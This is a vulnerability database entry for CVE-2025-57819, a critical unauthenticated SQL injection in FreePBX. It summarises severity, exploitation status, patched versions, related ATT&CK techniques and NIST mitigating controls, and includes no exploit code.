CVE-2025-57819
Published: 28 August 2025
Summary
CVE-2025-57819 is a critical-severity SQL Injection (CWE-89) vulnerability in Sangoma Freepbx. Its CVSS base score is 10.0 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 1.0% of CVEs by exploit likelihood; CISA has added it to the Known Exploited Vulnerabilities catalog; a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 AC-3 (Access Enforcement) and SI-10 (Information Input Validation).
Deeper analysis
FreePBX is an open-source web-based graphical user interface for managing Asterisk-based telephony systems. Versions 15, 16, and 17 of its endpoints contain a vulnerability stemming from insufficient sanitization of user-supplied data, which permits unauthenticated access to the FreePBX Administrator interface. The flaw maps to CWE-89 and CWE-288 and carries a CVSS 4.0 score of 10.0, enabling arbitrary database manipulation and remote code execution. Patches are available in endpoint releases 15.0.66, 16.0.89, and 17.0.3.
An unauthenticated attacker with network access can exploit the issue without any privileges or user interaction, directly reaching the administrative interface to alter database contents and execute arbitrary code on the underlying system. The attack vector is rated as network-reachable with low complexity, resulting in total compromise of confidentiality, integrity, and availability for both the application and its host.
Official advisories from the FreePBX project and the associated GitHub security advisory recommend immediate upgrade to the patched endpoint versions and advise restricting administrator access until updates can be applied. The vulnerability appears in CISA’s Known Exploited Vulnerabilities catalog, confirming observed in-the-wild exploitation. The associated EPSS score has reached a peak of 0.8128 with a current value of 0.7695.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2025-26123
Vulnerability details
FreePBX is an open-source web-based graphical user interface. FreePBX 15, 16, and 17 endpoints are vulnerable due to insufficiently sanitized user-supplied data allowing unauthenticated access to FreePBX Administrator leading to arbitrary database manipulation and remote code execution. This issue has…
more
been patched in endpoint versions 15.0.66, 16.0.89, and 17.0.3.
- CWE(s)
- KEV Date Added
- 29 August 2025
Related Threats
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Unauthenticated access via SQL injection enables arbitrary DB manipulation and RCE (T1190), demonstrated by deploying web shells (T1505.003), adding cron jobs (T1053.003), and creating local accounts (T1136.001).
CVEs Like This One
Affected Assets
Mitigating Controls
Mitigating Controls (NIST 800-53 r5) AI
Directly mitigates the vulnerability by requiring timely patching of affected FreePBX versions 15.0.66, 16.0.89, and 17.0.3 to fix the sanitization and authentication bypass flaws.
Addresses insufficient sanitization of user-supplied data by validating and sanitizing inputs to prevent SQL injection leading to database manipulation.
Enforces approved authorizations to block unauthenticated access to the FreePBX Administrator interface, countering the authentication bypass.